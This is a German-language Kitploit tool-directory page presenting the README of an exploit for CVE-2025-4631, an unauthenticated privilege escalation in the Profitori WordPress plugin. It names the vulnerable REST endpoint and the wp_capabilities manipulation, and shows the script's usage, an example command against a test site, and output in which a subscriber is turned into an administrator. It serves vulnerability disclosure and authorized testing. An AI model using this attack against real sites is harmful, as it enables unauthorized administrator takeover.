Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-4631 — Profitori 2.0.6.0 - 2.1.1.3 - Fehlende Autorisierung zu nicht authentifizierter Privilegieneskalation | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-4631
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-4631

CVE-2025-4631

Profitori 2.0.6.0 - 2.1.1.3 - Fehlende Autorisierung zu nicht authentifizierter Privilegieneskalation

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2025-4631 - Exploit zur Rechteausweitung des Profitori WordPress Plugins

📌 Zusammenfassung der Sicherheitslücke

Profitori Plugin (Versionen 2.0.6.0 bis 2.1.1.3) ist anfällig für Rechteausweitung ohne Authentifizierung aufgrund einer fehlenden Berechtigungsprüfung im Endpunkt /wp-json/stocktend/v1/stocktend_object. Dies ermöglicht entfernten Angreifern, die Berechtigungen vorhandener Benutzer zu erweitern (oder neue zu erstellen), indem sie das Metafeld wp_capabilities direkt manipulieren.

  • CVE: CVE-2025-4631
  • CVSS-Score: 9.8 (Kritisch)
  • Veröffentlicht: 30. Mai 2025
  • Zuletzt aktualisiert: 31. Mai 2025

🛠️ Was dieses Skript tut

Dieser Python-Exploit automatisiert den Rechteausweitungsprozess wie folgt:

  1. ✅ Überprüfen der Plugin-Version über die Datei readme.txt.
  2. 🚀 Ausnutzen des anfälligen REST-API-Endpunkts, falls eine anfällige Version erkannt wird.
  3. 📡 Senden der Nutzlast, um die Berechtigungen eines Benutzers auf Administrator zu erweitern.
  4. 🧾 Drucken formatierter, detaillierter Ergebnisse, einschließlich der geänderten Benutzeranmeldedaten.

Falls die Versionsprüfung fehlschlägt, fährt der Exploit vorsichtig mit einer Warnung fort.


📸 Exploit-Nachweis

Machbarkeitsnachweis


💻 Verwendung

root@kitploit:~
usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]

Beispiel:

root@kitploit:~
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3

Beispielausgabe:

root@kitploit:~
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!

[🧾] Updated User Information:
--------------------------------------
🆔 User ID         : 3
👤 Username        : subscriber
📧 Email           : [email protected]
🪪 Display Name    : Subscriber User
🔗 User URL        : 
🛡 Role Raw        : a:1:{s:13:"administrator";b:1;}

[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub       : https://github.com/Nxploited
📧 Email        : [email protected]

⚙️ Skriptargumente


📂 Voraussetzungen

  • Python 3.x
  • requests Bibliothek

Installation über:

root@kitploit:~
pip install requests

⚠️ Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungs- und autorisierte Testzwecke bereitgestellt. Jeglicher Missbrauch dieses Exploits gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist strengstens untersagt. Der Ersteller übernimmt keine Verantwortung für Schäden oder rechtliche Konsequenzen, die aus unsachgemäßer Verwendung entstehen.


VON: Nxploited ( Khaled_Alenazi )

Tool herunterladen
FlagBeschreibungErforderlich
-u, --url🌐 Basis-URL der WordPress-Site✅ Ja
-id🆔 ID des zu erhöhenden Benutzers✅ Ja
--email📧 Fiktive E-Mail zur Anzeige❌ Nein
--name👤 Anzeigename❌ Nein
--url_field🔗 Benutzer-URL-Feld❌ Nein
--verbose🔍 Vollständige JSON-Antwort ausgeben❌ Nein